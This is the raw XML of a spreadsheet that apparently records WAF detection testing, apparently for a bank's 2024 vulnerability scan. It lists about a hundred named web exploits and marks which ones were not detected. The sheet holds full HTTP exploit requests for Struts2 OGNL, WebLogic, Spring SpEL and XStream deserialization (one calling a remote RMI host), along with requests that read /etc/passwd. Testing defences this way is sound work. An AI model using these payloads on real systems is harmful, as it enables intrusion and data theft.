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50.35.142\SharedFolder\01、WAF\WAF\2024\20、台州银行2024漏扫\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{20DBE2CD-75F2-49D0-8EE3-53B9E623359C}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="38280" yWindow="4380" windowWidth="29040" windowHeight="15720" xr2:uid="{FF061239-F3BD-49F0-8A5D-C07BBEC70B27}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Sheet1!$A$1:$C$136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</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="408" uniqueCount="265">
  <si>
    <t>检测能力</t>
  </si>
  <si>
    <t>未能检测</t>
  </si>
  <si>
    <t>Spring Cloud Gateway 远程代码执行</t>
  </si>
  <si>
    <t>ElasticSearch Groovy 沙盒绕过 &amp;&amp; 代码执行</t>
  </si>
  <si>
    <t>Tomcat AJP 文件包含漏洞利用</t>
  </si>
  <si>
    <t>GoAhead 远程命令执行</t>
  </si>
  <si>
    <t>S2-005 远程代码执行(CVE-2010-1870)</t>
  </si>
  <si>
    <t>S2-032 远程代码执行1(CVE-2016-3081)</t>
  </si>
  <si>
    <t>S2-045 远程代码执行(CVE-2017-5638)</t>
  </si>
  <si>
    <t>S2-057 远程命令执行(CVE-2018-11776)</t>
  </si>
  <si>
    <t>Spring Data Rest 远程命令执行(CVE-2017-8046)</t>
  </si>
  <si>
    <t>zabbix SQL注入_1</t>
  </si>
  <si>
    <t>Weblogic远程命令执行(CVE-2019-2729)</t>
  </si>
  <si>
    <t>S2-045远程代码执行_1</t>
  </si>
  <si>
    <t>S2-057 远程命令执行_1</t>
  </si>
  <si>
    <t>Tomcat PUT任意文件上传_2</t>
  </si>
  <si>
    <t>Stream 反序列化命令执行</t>
  </si>
  <si>
    <t>Spring Data Rest 远程命令执行</t>
  </si>
  <si>
    <t>Spring Data Commons 远程命令执行</t>
  </si>
  <si>
    <t>Ruby on Rails 路径穿越与任意文件读取_2</t>
  </si>
  <si>
    <t>mini_httpd任意文件读取</t>
  </si>
  <si>
    <t>Jetty WEB-INF 敏感信息泄露</t>
  </si>
  <si>
    <t>Spring Security OAuth RCE 漏洞利用</t>
  </si>
  <si>
    <t>uWSGI PHP目录穿越</t>
  </si>
  <si>
    <t>Spring Messaging 远程命令执行(CVE-2018-1270)</t>
  </si>
  <si>
    <t>S2-046 远程代码执行(CVE-2017-5638)</t>
  </si>
  <si>
    <t>Apache Log4j2 lookup JNDI 注入</t>
  </si>
  <si>
    <t>XStream 反序列化命令执行</t>
  </si>
  <si>
    <t>Fastjson 1.2.24 反序列化导致任意命令执行</t>
  </si>
  <si>
    <t>Jackson-databind 反序列化漏洞利用_1</t>
  </si>
  <si>
    <t>Tomcat PUT任意文件上传_1</t>
  </si>
  <si>
    <t>S2-037 远程代码执行_1(CVE-2016-4438)</t>
  </si>
  <si>
    <t>S2-033 远程代码执行_1(CVE-2016-3087)</t>
  </si>
  <si>
    <t>Spring Messaging 远程命令执行</t>
  </si>
  <si>
    <t>SQL攻击：大小写绕过</t>
  </si>
  <si>
    <t>Apache Solr远程代码执行</t>
  </si>
  <si>
    <t>华硕路由命令注入</t>
  </si>
  <si>
    <t>Node.js 目录穿越</t>
  </si>
  <si>
    <t>Metabase 信息泄露</t>
  </si>
  <si>
    <t>Webmin命令注入</t>
  </si>
  <si>
    <t>TOTOLINK Technology 路由器命令注入（CVE-2022-26208）</t>
  </si>
  <si>
    <t>WebLogic代码执行_1（CVE-2020-14882）</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Accept-Encoding: identity
cmd: pwd
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /cgi-bin/cstecgi.cgi HTTP/1.1</t>
  </si>
  <si>
    <t>WordPress RegistrationMagic插件授权问题漏洞利用</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Nacos 认证绕过</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>CloudBees Jenkins Script Security Plugin 1.50命令执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>PostgreSQL 提权</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>WebLogic XMLDecoder反序列化(CVE-2017-10271)(后渗透)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Netlink GPON路由器命令注入</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>SQL攻击：Sqlserver sql注入（url编码）</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>apache commons configuration任意代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Lanproxy 任意文件读取(CVE-2021-3019)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Apache Solr Velocity 注入远程命令执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Kibana本地文件包含漏洞利用</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Nexus Repository Manager 3 远程命令执行_1</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Apache Solr远程代码注入(CVE-2019-17558)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>PHP-CGI远程任意代码执行_2</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Supervisord 远程代码执行_2</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>uWSGI 目录穿越 (CVE-2018-7490)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>PHP-CGI远程任意代码执行_3</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Apache Shiro 反序列化漏洞利用</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>TotoLink 多款产品命令注入 (CVE-2022-26208)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>node-postgres 代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Zabbix 远程代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>SQL攻击：HSQLDB &gt;= 2.0 堆叠查询注入 (heavy query)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>泛微E-cology OA /weaver/代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>SQL攻击：Sqlserver sql注入（%u编码）</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>SQL攻击：HSQLDB &gt;= 1.7.2 堆叠查询注入 (heavy query)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>taocms任意文件删除</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Nexus Repository Manager 3 远程命令执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>netlink gpon路由器命远程代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>ShopXO任意文件读取</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Struts2远程代码执行(S2-045)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>BEESCMS企业网站管理系admin_book.php后台SQL注入</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Apache Solr 远程命令执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>PHP-CGI远程任意代码执行_1</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Apache Unomi远程代码执行_1</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Oxwall 远程代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Panabit Panalog 任意用户创建漏洞利用</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Drupal远程命令执行(CVE-2018-7600)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>JBoss 4.x JBossMQ JMS 反序列化 (CVE-2017-7504)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Tenda AC9 命令注入（CVE-2022-36273）</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>SQL攻击：Sqlserver sql注入（url预编码）</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>台湾 DEMSW 需量管理系統信息泄漏</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>NetMizer日志管理系统dirlist.php文件任意目录遍历</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Sonatype Nexus Repository Manager命令执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>万户OA文件上传漏洞利用</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Ruby on Rails Sprockets任意文件读取(CVE-2018-3760)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>跨站脚本(XSS)攻击：参数注入_1</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>SQL攻击：微软Access 布尔型盲注 - 堆叠查询注入</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>mongo-express 远程代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>OpenTSDB远程代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Redis Lua沙盒绕过命令执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Supervisord 远程代码执行_1</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Apache Unomi远程代码执行_2</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Zabbix Server trapper 命令注入</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>PHP imap远程命令执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Nginx 文件名逻辑漏洞利用</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>winmail邮件管理系统任意文件下载</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>通达oa远程代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>SQL攻击：Sqlserver sql注入（假参数）</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>FFasterXML/jackson-databind json转java对象远程代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Mikrotik-Router-Monitoring-System SQL注入</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Cisco Data Center Network Manager命令注入</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Elasticsearch命令执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>CentOS Web Panel本地文件包含漏洞利用</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>linuxKi6.01远程命令注入</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>HPE远程代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>WordPress MasterStudy LMS 安全绕过</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>D-link 823pro v1.0.2命令执行（CVE-2022-28573）</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>.git敏感文件信息泄露</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>FactoryTalk反序列化漏洞利用</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>SQL攻击：HSQLDB &gt;= 1.7.2 时间型盲注 - 参数替换 (heavy query)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>攻击载荷</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>SQL攻击：HSQLDB &gt; 2.0 时间型盲注 - 参数替换 (heavy query)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>WebLogic代码执行_2（CVE-2020-14882）</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Spring Cloud Function SpEL 远程代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>S2-045远程代码执行_2</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Spring Data Commons 远程命令执行(CVE-2018-1273)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>S2-057 远程命令执行_2</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>ffmpeg 任意文件读取_1</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>JBoss 5.x6.x 反序列化漏洞利用</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Weblogic远程命令执行(CVE-2020-2551)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Ruby on Rails 路径穿越与任意文件读取_1</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Jetty 通用 Servlets 组件 ConcatServlet 信息泄露</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Jackson-databind 反序列化漏洞利用_2</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Weblogic远程命令执行(CVE-2015-4852)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Spring Framework远程代码执行</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>S2-015 远程代码执行(CVE-2013-2135, CVE-2013-2134)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /actuator/gateway/routes/hacktest HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Content-Length: 307
Accept-Encoding: identity
Content-Type: application/json
{
  "id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
  "name": "Result",
  "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
  }],
  "uri": "http://example.com"
}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&amp;(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&amp;(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success3%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>GET /%24%7b%23%63%6f%6e%74%65%78%74%5b%27%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%27%5d%3d%66%61%6c%73%65%2c%23%6d%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%44%65%63%6c%61%72%65%64%46%69%65%6c%64%28%27%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%27%29%2c%23%6d%2e%73%65%74%41%63%63%65%73%73%69%62%6c%65%28%74%72%75%65%29%2c%23%6d%2e%73%65%74%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2c%74%72%75%65%29%2c%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%77%68%6f%61%6d%69%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%2c%23%71%7d.action HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&amp;pp=%5C%5CA&amp;ppp=%20&amp;encoding=UTF-8&amp;cmd=id HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: identity
Content-Type: "%{(#xxx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"whoami"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java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /struts2-showcase/$%7B233*233%7D/actionChain1.action HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>PATCH /customers/1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 200
Accept-Encoding: identity
Content-Type: application/json-patch+json
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /latest.php?output=ajax&amp;sid=6398f8cc76b768d6&amp;favobj=toggle&amp;toggle_open_state=1&amp;toggle_ids[]=updatexml(0,concat(0xa,user()),0) HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /_async/AsyncResponseService HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 831
Accept-Encoding: identity
SOAPAction: 
cmd: whoami
content-type: text/xml
&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;
&lt;soapenv:Header&gt;
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;/bin/bash&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;-c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;echo `cat /etc/passwd` &gt;  servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/cheat.jsp
&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: identity
Content-Type: %{(#_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echo pwn^test123 pwn$1test123').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new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
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>PUT /test1.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 11
Accept-Encoding: identity
Content-Type: text/plain
test put111</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 2984
Accept-Encoding: identity
&lt;sorted-set&gt;
 &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
  &lt;type&gt;ysomap&lt;/type&gt;
  &lt;value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'&gt;
   &lt;m__DTMXRTreeFrag&gt;
     &lt;m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'&gt;
      &lt;m__size&gt;-10086&lt;/m__size&gt;
      &lt;m__mgrDefault&gt;
       &lt;__overrideDefaultParser&gt;false&lt;/__overrideDefaultParser&gt;
       &lt;m__incremental&gt;false&lt;/m__incremental&gt;
       &lt;m__source__location&gt;false&lt;/m__source__location&gt;
       &lt;m__dtms&gt;
        &lt;null/&gt;
       &lt;/m__dtms&gt;
       &lt;m__defaultHandler/&gt;
      &lt;/m__mgrDefault&gt;
      &lt;m__shouldStripWS&gt;false&lt;/m__shouldStripWS&gt;
      &lt;m__indexing&gt;false&lt;/m__indexing&gt;
      &lt;m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'&gt;
       &lt;fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'&gt;
        &lt;javax.sql.rowset.BaseRowSet&gt;
          &lt;default&gt;
          &lt;concurrency&gt;1008&lt;/concurrency&gt;
          &lt;escapeProcessing&gt;true&lt;/escapeProcessing&gt;
          &lt;fetchDir&gt;1000&lt;/fetchDir&gt;
          &lt;fetchSize&gt;0&lt;/fetchSize&gt;
          &lt;isolation&gt;2&lt;/isolation&gt;
          &lt;maxFieldSize&gt;0&lt;/maxFieldSize&gt;
          &lt;maxRows&gt;0&lt;/maxRows&gt;
          &lt;queryTimeout&gt;0&lt;/queryTimeout&gt;
          &lt;readOnly&gt;true&lt;/readOnly&gt;
          &lt;rowSetType&gt;1004&lt;/rowSetType&gt;
          &lt;showDeleted&gt;false&lt;/showDeleted&gt;
          &lt;dataSource&gt;rmi://192.168.248.132:1099/hyozdi&lt;/dataSource&gt;
          &lt;listeners/&gt;
          &lt;params/&gt;
         &lt;/default&gt;
        &lt;/javax.sql.rowset.BaseRowSet&gt;
        &lt;com.sun.rowset.JdbcRowSetImpl&gt;
         &lt;default/&gt;
        &lt;/com.sun.rowset.JdbcRowSetImpl&gt;
       &lt;/fPullParserConfig&gt;
       &lt;fConfigSetInput&gt;
        &lt;class&gt;com.sun.rowset.JdbcRowSetImpl&lt;/class&gt;
        &lt;name&gt;setAutoCommit&lt;/name&gt;
        &lt;parameter-types&gt;
         &lt;class&gt;boolean&lt;/class&gt;
        &lt;/parameter-types&gt;
       &lt;/fConfigSetInput&gt;
       &lt;fConfigParse reference='../fConfigSetInput'/&gt;
       &lt;fParseInProgress&gt;false&lt;/fParseInProgress&gt;
      &lt;/m__incrementalSAXSource&gt;
      &lt;m__walker&gt;
       &lt;nextIsRaw&gt;false&lt;/nextIsRaw&gt;
      &lt;/m__walker&gt;
      &lt;m__endDocumentOccured&gt;false&lt;/m__endDocumentOccured&gt;
      &lt;m__idAttributes/&gt;
      &lt;m__textPendingStart&gt;-1&lt;/m__textPendingStart&gt;
      &lt;m__useSourceLocationProperty&gt;false&lt;/m__useSourceLocationProperty&gt;
      &lt;m__pastFirstElement&gt;false&lt;/m__pastFirstElement&gt;
     &lt;/m__dtm&gt;
     &lt;m__dtmIdentity&gt;1&lt;/m__dtmIdentity&gt;
   &lt;/m__DTMXRTreeFrag&gt;
   &lt;m__dtmRoot&gt;1&lt;/m__dtmRoot&gt;
   &lt;m__allowRelease&gt;false&lt;/m__allowRelease&gt;
  &lt;/value&gt;
 &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
 &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
  &lt;type&gt;ysomap&lt;/type&gt;
  &lt;value class='com.sun.org.apache.xpath.internal.objects.XString'&gt;
   &lt;m__obj class='string'&gt;test&lt;/m__obj&gt;
  &lt;/value&gt;
 &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
&lt;/sorted-set&gt;
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /users?page&amp;size=5 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Content-Length: 124
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&amp;password=&amp;repeatedPassword=</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /robots HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /%25u002e/WEB-INF/web.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
